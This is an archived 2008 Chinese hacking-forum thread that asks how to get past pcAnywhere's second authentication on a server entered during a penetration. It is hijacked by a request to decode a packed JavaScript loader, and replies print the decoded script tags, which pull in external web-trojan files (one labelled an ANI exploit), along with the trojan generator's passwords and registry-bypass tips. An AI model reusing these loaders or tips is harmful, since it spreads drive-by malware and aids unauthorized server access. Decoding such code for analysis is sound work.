【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: [讨论]pcanywhere二次验证密码存放在哪？ [打印本页]

作者: valen886 时间: 2008-7-25 13:50 标题: [讨论]pcanywhere二次验证密码存放在哪？

[讨论]pcanywhere二次验证密码存放在哪？
议题作者：hackest
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

大家都知道pcanywhere是一个远程管理服务器的工具
但是在渗透中如何遇到服务器处于锁定状态
而我们又没有管理员权限的时候
也就是只拿到了pcanywhere的连接密码
却没有系统用户和密码
处于锁定状态的问题以前讨论过了
不过解决的方法貌似不太完美和实际

而且pcanywhere在连接上的时候即使没有管理员权限
也可以直接重启服务器
不过如果想要执行传送文件或者执行命令之类的操作就会要求进行二次验证
这个密码和pcanywhere的连接密码试了很多都没有发现相同的
不知道它的密码存放在哪里
总之找遍了*.cif文件所得的密码都无法通过验证！
难道是要求验证系统用户？！
希望大家讨论下，指点下小弟，嘿嘿

My Blog：http://www.hackest.cn/ [H.S.T]：http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男来自广东在线时间941 小时注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP 良辰择日，预测咨询，公司改名，权威易经

寂寞宝贝

荣誉会员

作者: 虎儿 时间: 2008-7-25 13:50

二次验证密码?不会呀!我要传的话他直接让我输系统的.........成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男来自云南在线时间172 小时注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料TOP 爱要怎么说出口

抗战二十年

晶莹剔透§烈日灼然

作者: 小小夏 时间: 2008-7-25 13:50

兄弟借个地方用一下因为我不能发贴谢谢！
--------------------------------------------------------
谁能帮我解密这段代码

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('A("\\7\\9\\m\\6\\l\\k\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\z\\d\\5\\9\\n\\f\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\c\\u\\1\\b\\9\\1\\u\\j\\i\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\y\\d\\e\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\j\\i\\j\\i\\x\\6\\4\\n\\f\\d\\9\\0\\a\\e\\5\\7\\0\\d\\w\\7\\9\\m\\6\\v")',37,37,'164|42|163|57|143|162|157|151|160|156|56|134|11|145|167|155|76|74|12|15|75|40|146|165|152|113|61|71|72|150|53|51|50|144|116|126|eval'.split('|'),0,{}))

代码地址 http://7y7.us/2.js不经风雨，怎见彩虹？
帖子30 精华0 积分68 阅读权限40 性别男在线时间31 小时注册时间2006-10-11 最后登录2008-4-26 查看详细资料TOP 少女暴富的隐秘（图）

netpatch

荣誉会员

作者: 阿翠 时间: 2008-7-25 13:50

第一层加密
解后
eval("\151\156\146\157\40\75\11\11\42\74\163\143\162\151\160\164\40\163\162\143\75\134\42\150\164\164\160\72\57\57\167\163\71\61\56\143\157\155\57\157\113\57\126\145\162\156\165\155\56\152\163\134\42\76\74\57\163\143\162\151\160\164\76\42\11\53\42\134\156\42\53\15\12\11\11\42\74\163\143\162\151\160\164\40\163\162\143\75\134\42\150\164\164\160\72\57\57\167\163\71\61\56\143\157\155\57\157\113\57\116\145\167\56\152\163\134\42\76\74\57\163\143\162\151\160\164\76\42\15\12\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\151\156\146\157\51")
第二层加密
解后
info = "<script src=\"http://ws91.com/oK/Vernum.js\"></script>" +"\n"+
"<script src=\"http://ws91.com/oK/New.js\"></script>"

document.write(info)

ANI网马!通往胜利的路不只一条！
帖子89 精华4 积分3262 阅读权限100 在线时间212 小时注册时间2005-3-23 最后登录2008-7-2 查看详细资料TOP

netpatch

荣誉会员

作者: 凡人 时间: 2008-7-25 13:50

http://ws91.com/oK/Vernum.js //014网马
http://ws91.com/oK/New.js //ANI网马通往胜利的路不只一条！
帖子89 精华4 积分3262 阅读权限100 在线时间212 小时注册时间2005-3-23 最后登录2008-7-2 查看详细资料TOP 少女暴富的隐秘（图）

vikxeo

荣誉会员

作者: wwgywl 时间: 2008-7-25 13:50

alert 再八进制就ok
帖子58 精华2 积分182 阅读权限100 性别男在线时间283 小时注册时间2005-8-14 最后登录2008-6-6 查看详细资料TOP 良辰择日，预测咨询，公司改名，权威易经

huangqing

晶莹剔透§烈日灼然

作者: betty 时间: 2008-7-25 13:50

七贱的，，
他那个网马生成的密码，
搞笑死了，
不知道你知道不知道密码，密码是wokankan
有需要的可以去
偶不是罐水哦

帖子13 精华0 积分48 阅读权限40 性别男在线时间83 小时注册时间2007-1-10 最后登录2008-7-23 查看详细资料TOP 让女孩一夜变的更有女人味

hackest

运维管理组

作者: BG7LHT 时间: 2008-7-25 13:50

我汗，我的问题没解决
倒解决了你的问题，晕哦
正所谓强宾不压主

My Blog：http://www.hackest.cn/ [H.S.T]：http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男来自广东在线时间941 小时注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP

ttfct

荣誉会员

作者: 网飞鸿 时间: 2008-7-25 13:50

跑题了,晕猪,回答的毛的问题哦!

管理员都不看一下索?TTFCT http://WWW.TTFCT.COM

帖子279 精华4 积分4349 阅读权限100 性别男在线时间111 小时注册时间2006-2-13 最后登录2008-7-20 查看详细资料TOP

hackest

运维管理组

作者: Cici 时间: 2008-7-25 13:50

貌似那个不叫二次加密咧
据说就是系统的密码，晕哦！
那岂不是没戏了，郁闷

My Blog：http://www.hackest.cn/ [H.S.T]：http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男来自广东在线时间941 小时注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP

hhiijj123

晶莹剔透§烈日灼然

作者: 马自达 时间: 2008-7-25 13:50

引用:
引用第9楼hackest于2007-04-19 16:42发表的 :
貌似那个不叫二次加密咧
据说就是系统的密码，晕哦！
那岂不是没戏了，郁闷

是啊就是系统密码没有听说什么二次加密的DD
帖子2 精华0 积分9 阅读权限40 性别男在线时间4 小时注册时间2006-8-23 最后登录2007-4-19 查看详细资料TOP

陆羽

荣誉会员

作者: 5000564 时间: 2008-7-25 13:50

引用:
引用第6楼huangqing于2007-04-19 16:10发表的 :
七贱的，，
他那个网马生成的密码，
搞笑死了，
不知道你知道不知道密码，密码是wokankan
有需要的可以去
.......
楼上不好意思
人家换密码了~.
呵呵
现在是nikankan
帖子11 精华0 积分38 阅读权限100 在线时间14 小时注册时间2005-12-22 最后登录2008-7-8 查看详细资料TOP

heiye88

晶莹剔透§烈日灼然

作者: dghgs 时间: 2008-7-25 13:50

写个解密页面吧。。。大大们。。。ALERT出来后的数据如何能复制呀。。。比如alert("aaa") 弹出对话框呀。。如何把弹出来的数据复制出来。。谢谢。。
帖子64 精华0 积分239 阅读权限40 在线时间124 小时注册时间2007-1-25 最后登录2008-7-18 查看详细资料TOP

heiye88

晶莹剔透§烈日灼然

作者: 小树 时间: 2008-7-25 13:50

<SCRIPT LANGUAGE="JavaScript">
alert("\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B")
</SCRIPT>

就会弹出对话框告诉你解密后的结果！
如何保存这个结果呀。。。。。。。。。
帖子64 精华0 积分239 阅读权限40 在线时间124 小时注册时间2007-1-25 最后登录2008-7-18 查看详细资料TOP

kiss8888

晶莹剔透§烈日灼然

作者: 凯旋归来 时间: 2008-7-25 13:50

引用:
引用第3楼netpatch于2007-04-19 14:07发表的 :
第一层加密
解后
eval("151156146157407511114274163143162151160164401631621437513442150164164160725757167163716156143157155571571135712614516215616515556152163134427674571631431621511601647642115342134156425315121111427416314316215116016440163162143751344215016416416072575716716371615614315715557157113571161451675615216313442767457163143162151160164764215121512144157143165155145156164561671621511641455015115614615751")
第二层加密
解后
.......
俺是一个菜鸟，请问：\\7\\9\\m\\6\\l\\k\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\z\\d\\5\\9\\n\\f\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\c\\u\\1\\b\\9\\1\\u\\j\\i\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\y\\d\\e\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\j\\i\\j\\i\\x\\6\\4\\n\\f\\d\\9\\0\\a\\e\\5\\7\\0\\d\\w\\7\\9\\m\\6\\“
这是用什么工具加密的？谢谢。
帖子1 精华0 积分9 阅读权限40 在线时间7 小时注册时间2007-2-21 最后登录2008-7-4 查看详细资料TOP

heiye88

晶莹剔透§烈日灼然

作者: callach 时间: 2008-7-25 13:50

顶！<SCRIPT LANGUAGE="JavaScript">
alert("\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B")
</SCRIPT>

就会弹出对话框告诉你解密后的结果！
如何保存这个结果呀。。。。。。。。。
帖子64 精华0 积分239 阅读权限40 在线时间124 小时注册时间2007-1-25 最后登录2008-7-18 查看详细资料TOP

hackest

运维管理组

作者: 飞翔吧 时间: 2008-7-25 13:50

那个是转换过的十六进制数啦
\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B
这些是十六进制形式的了！My Blog：http://www.hackest.cn/ [H.S.T]：http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男来自广东在线时间941 小时注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP

heiye88

晶莹剔透§烈日灼然

作者: fulu 时间: 2008-7-25 13:50

楼上的你没看明白我的意思呵呵。。我是说如何将alert后的结果保存出来...他是个对话框。。。如何复制出来解密后的数据。。。
帖子64 精华0 积分239 阅读权限40 在线时间124 小时注册时间2007-1-25 最后登录2008-7-18 查看详细资料TOP

寂寞宝贝

荣誉会员

作者: 伤人 时间: 2008-7-25 13:50

我R./........你们搞什么飞机,看清楚这个论题,这不是解密的................要研究专门开个帖子,害得我还以为有牛人弄出那什么二次密码了!成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男来自云南在线时间172 小时注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料TOP

hackest

运维管理组

作者: zhcaihhhh 时间: 2008-7-25 13:50

我也晕了啦
发个帖子被借掉了
下次不敢发了……

My Blog：http://www.hackest.cn/ [H.S.T]：http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男来自广东在线时间941 小时注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP

heiye88

晶莹剔透§烈日灼然

作者: fulu 时间: 2008-7-25 13:50

修改注册表..不使用2次密码
帖子64 精华0 积分239 阅读权限40 在线时间124 小时注册时间2007-1-25 最后登录2008-7-18 查看详细资料TOP

平安年间

晶莹剔透§烈日灼然

作者: 大头虾 时间: 2008-7-25 13:50

我这也有个问题，如果被控端修改了pcanywhere的默认连接端口，保存在哪里？
如果是保存在cif文件里，那么如何才能读取出来？并非高手

帖子62 精华2 积分245 阅读权限40 性别男在线时间11 小时注册时间2006-10-3 最后登录2008-5-13 查看个人网站
查看详细资料TOP

hackest

运维管理组

作者: wwgywl 时间: 2008-7-25 13:50

端口貌似是写进注册表的吧

My Blog：http://www.hackest.cn/ [H.S.T]：http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男来自广东在线时间941 小时注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP

平安年间

晶莹剔透§烈日灼然

作者: Alice 时间: 2008-7-25 13:50

谢楼上的啦，可惜我遇的那个服务器比较变态，可能没有权限读注册表并非高手

帖子62 精华2 积分245 阅读权限40 性别男在线时间11 小时注册时间2006-10-3 最后登录2008-5-13 查看个人网站
查看详细资料TOP

remax

晶莹剔透§烈日灼然

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)